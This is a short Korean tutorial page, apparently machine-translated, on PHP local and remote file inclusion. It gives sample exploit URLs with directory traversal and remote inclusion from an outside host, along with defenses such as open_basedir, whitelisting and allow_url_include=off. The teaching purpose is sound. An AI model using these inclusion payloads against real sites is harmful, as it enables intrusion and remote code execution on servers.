php 로 컬 파일 포함 & 원 격 파일 포함
1994 단어 web
php 파일 포함 함수:
include()
require()
include_once()
require_once()
로 컬 파일 포함:
exploit:
현재 디 렉 터 리 를 포함 하 는 lfi. txt (내용 은):
크로스 디 렉 터 리 포함:
http://localhost:81/lfi/lfi.php?test=../lfi.txt # lfi.txt
http://localhost:81/lfi/lfi.php?test=/lfi_in/lfi.txt # lfi.txt 방어:
크로스 디 렉 터 리 방지:
php. ini 에 open 설정basedir
open_basedir = C:\Program Files\phpStudy\WWW\lfi # ( )open_basedir = C:\Program Files\phpStudy\WWW\lfi\ # ( )open_basedir 돌아 갈 수 있 음: wooyn 링크
로 컬 파일 포함 방지: 매 거 진 사용
$file =$_GET['test'];
switch ($file) {
case 'lfi.txt':
include('./lfi.txt');
break;
default:
include('./notexists.txt');
break;
}
?>원 격 파일 포함:
exploit:
http://localhost:81/lfi/rfi.php?file=http://ip_address/php/rfi/rfi.txt?기교:?url 의 query string 으로 해석 되 며 원 격 파일 에 포 함 될 때 코드 의 뒤의 내용 을 차단 할 수 있 습 니 다.
방어:
php. ini 프로필 에 allowurl_include=off
파일 사용 방법 포함:
1. 원 격 파일 포함 시 data: / / (> 5.2.0) 또는 input: / 프로 토 콜
/rfi.php?file=data:text/plain,
첨부: php 보안 설정
Register_globals =off
Open_basedir
Allow_url_include =off
Display_errors =off
Log_errors = on
Magic_quotes_gpc =off
Cgi.fix_pathinfo
Session.cookie_httponly
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
Portswigger의 연구실 작성: CSRF 토큰 보호를 사용한 기본 클릭재킹이 견습생 수준 실습에서는 일부 CSRF 토큰 보호가 있음에도 불구하고 클릭재킹에 취약한 웹사이트에서 계정 삭제 흐름을 악용합니다. 주어진 자격 증명으로 로그인하면 계정 페이지로 이동한 후 사용자 계정을 삭제하는 데...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.
좋은 웹페이지 즐겨찾기
